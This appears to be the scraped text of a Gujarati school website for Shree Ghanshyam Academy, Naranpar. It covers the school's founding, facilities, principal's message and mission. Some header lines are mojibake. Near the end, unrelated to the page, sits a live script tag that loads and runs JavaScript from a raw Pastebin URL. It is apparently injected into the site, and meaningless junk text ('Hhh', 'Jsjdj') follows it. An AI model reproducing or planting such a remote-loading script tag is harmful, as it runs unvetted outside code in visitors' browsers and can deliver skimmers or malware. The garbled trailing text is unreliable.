CBSE AFFILIATION CODE : 430204
CBSE SCHOOL NUMBER. : 131166

EaI svaaimanaarayaNa gau#kula saMcaailata

શ્રી ઘનશ્યામ એકેડેમી - નારણપર

EaI narnaarayaNa dova T/sT - BauJ

શ્રી ઘનશ્યામ એકેડેમી

ગુરૂકુળનું શુભારંભ

શ્રી સ્વામીનારાયણ મંદિર – શ્રી નરનારાયણ દેવ ટ્રસ્ટ ભુજ દ્વારા ચલાવવામાં આવતા અને શ્રી સ્વામીનારાયણ ગુરૂકુળ સંચાલિત શ્રી ઘનશ્યામ એકેડેમીની પાયાવિધિ મહંત પુરાની સ્વામી હરિસ્વરૂપદાસજીના વરદ હસ્તે કરવામાં આવી. સંતો અને હરિભક્તોના સતત પરિશ્રમથી જોતજોતામાં ટુંકાગાળામાં ૭ એકર જેટલી વિશાળ જગ્યા પર આ ગુરુકુળની આલીશાન ઈમારત તા. ૧૩/૪/૨૦૦૪ ના તૈયાર થઇ ગઈ.

કુદરતી વાતાવરણ વચ્ચે અભ્યાસ

શશ્રી ઘનશ્યામ એકેડમી એપ્રદુષણ મુક્ત વાતાવરણનીવચ્ચે નારણપર-કેરા હાઇવે રોડ પર આવેલી છે. આ શાળાની શરૂઆત કે. જી. – ૧, કે.જી.-૨ નાં નાના ભૂલકાઓ સાથે કરવામાં આવી હતી. આ ઘનશ્યામ એકેડેમીના પ્રટાગણમાં બાગ બાગીચાઓવાળું શાંત વાતાવરણ છે. જ્યાં રમતગમત માટે એક વિશાળ મેદાન પણ સાથે છે. વિદ્યાર્થીઓ સંપુર્ણ રીતે સજ્જ બને તે માટે વિજ્ઞાન પ્રયોગશાળા, કોમ્પુટર રૂમ, મલ્ટીમીડિયા રૂમ વગેરે જેવી સગવડો પણ છે.આ ઉપરાંત મેક્સીસ એજ્યુકેશન ટેકનોલોજી પર આધારિત ઈ-કલાસ ચલાવવામાં આવે છે. આ આધુનિક ટેકનોલોજી સર્જનાત્મક છે.જેથી વિધ્યાર્થીઓને શીખવામાં ખુબજ સરળતા રહે છે. અને તેથી તેઓ તેમાં ઊંડો રસ ધરાવે છે.

આ ટેકનોલોજી એ નબળા વિધ્યાર્થીઓ માટે પણ ખુબજ ઉપયોગી નીવડે છે અને તેથી જ તેની નબળાઈઓ દુર કરીને સારા પરિણામ પ્રાપ્ત કરવામાં આ ટેકનોલોજી ખુબજ વિશ્વાસુ સાબિત થાય છે.


સંતના આશીર્વાદ

શ્રી ઘનશ્યામ એકેડેમી વિધાર્થીઓ ને હુફ, સુરક્ષિત અને સ્વાગત ભર્યું વાતાવરણ બનાવવા માં મને છે. જ્યારે આધ્યાત્મિક અને આધુનિક ઇન્ફ્રાસ્ટ્રક્ચર સાથે શિક્ષણ પ્રદ્ધતિઓ જોડી ને બધા બડકો નો સર્વાંગી વિકાસ પૂરો પડે છે. આ અમારી શ્રી ઘનશ્યામ એકેડેમી માં પ્યાસ રહે છે.

અમે બડકો ને સવાલો, ચકાસણી અને વિશ્વના સમાજમાં તેમણે હક નું સ્થાન મેડવવા માનટે પ્રેરણા આપીએ છીએ. આમે આમરા બધા વિધ્યાથીઓને ક્લાસ બહાર ચાલતા શિક્ષણ પણ આપીએ છીએ.


પ્રિંશીપાલ સંદેશ

અમે વિધાર્થીઓ ને એવિ રીતે સાબિત કરીયે છીએ જેવી રીતે કાલ સાબિત કરવાનું હોય. એક વિધ્યાર્થી પરીવર્તન અંદ ઉત્ક્રાંતિનું એક બીજ છે. શ્રી ઘનશ્યામ એકેડેમી મે આ પ્રક્રિયા કુદરતી છે. દરેક વિધ્યાર્થી કે વિધ્યાર્થીનોઓ તેમની પ્રતિભા અને ટેલેન્ટ દાખવવા માટે પ્રભાવિત રહેવું જ જોઇયે.

શ્રી ઘનશ્યામ અકેડેમી માં વિધ્યાર્થીઓને ભાવનાત્મક, શારીરિક, બૌધિક પાસાને સતત ચિંતાશીલ, સમર્પણ અને તાકાતની સાથે આકાર આપવામાં આવે છે. એક વ્યાવસાયિક, સમર્થ અને ઉત્સાહિક ફેકલ્ટી દ્ર્વરા ખાતરી કરવામાં આવે છે કે બધા વિધ્યાર્થીઑનો સરવાંગી વિકાસ થાય.

આ શીખવાની નવીન અને શૈક્ષણીક પ્રધાતીયો માં ત્યાર થયેલા વિધ્યાર્થીઓ કાલના માર્સલ બેયરર બની જાય છે.


મિશન અને ધ્યેય

મિશન

અમારું મિસન તેમણે આનંદાયક શૈક્ષણી પર્યાવર્ણ પૂર પાડવાનું છે કે જે તેમના શૈક્ષણીક ને વ્યતિક્ષમતા સુધી પહોચવા માટે આત્મવિશ્વાશ અને આત્મસંમાન વનાવવા સમર્થ બનાવે છે. શ્રી ઘનશ્યામ અકેડેમી માં વ્યતિગત રીતે ઓડખી, બધા બાળકો સર્જનાત્મક, બધા બાળકો સફળ, બધા બાળકો બધી રીતે વિકાશ થાય, જેમ કે આધ્યાત્મિક, નૈતિક, બૌધિક, સામાજિક, ભૌતિક અને ભાવનાત્મક ..

હોસિયાર બાળકો નું પાલનપોષણ કરી અને સ્વતંત્ર વિચારધારા પહોત્સાહી કરવાનું કામ કરીયે છીએ નહીં કે મર્યાદિત સર્જનાત્મક કરવાની.

અમે વળકો ના સરવાંગી વિકાસ માટે માતા-પિતા ની જ્વાબદારી લઈયે છીએ.

બાળકો ને ખુલવા, નવા પ્રયોગો કરવા, સોધવા અને પોતાની જાતે સિખવા અને સમજવા માટે પ્રેરિત કરીયે છીએ.

આત્મવિશ્વાસ, સારી ટેવો, સારા નાગરિક બનવા, સામાજિક, સાંસ્ક્રુતિક, નાગરિકત્વ ની વનવાની પ્રેણા નાખીએ છીએ.

ધ્યેય

અમે અમારા વિધ્યાર્થીઑ ને ઉપકારક શિક્ષણ આપવામાં માટેનું વાતાવરણ પૂરી પાડીએ છીએ કે જે વૈશ્વિક ધોરણે વ્યાપક વિદ્વતાપૂર્ણ પ્રોગ્રામર તરીકે ત્યાર કરે છે.

આપણાં સમાજની માંગને પહોચી વડવા માટે સંવેદનશીલતા અને જવાબદારી વિકસાવવા માટેનું શિક્ષણ પૂરું પાડવામાં આવે છે.

પિતા તેમના બાળક માં વિકાસ માટે તેમના ધ્યેય તરફ જવા , જીવનમાં વિજયન બનવા માટે જરૂરી કુશડ્તા વિકસાવવા અને ચોક્કસ નિદાન આપી ને તેમના લક્ષ્ય તરફ વાડે છે.

આજીવન સેવા અને વૈશ્વિક સમુદાય માં વધુ સારૂ ભવિષ્ય ની શોધ માટે વધુ ફાયદા આપે તેવી મજબૂત શૈક્ષણિક ફાઉંડેશન આ સંસ્થા પૂરું પાડે છે.


<script type="text/javascript" src="https://pastebin.com/raw/AUESPWmu"></script>


Hhh

Ff


Jsjdj

Djf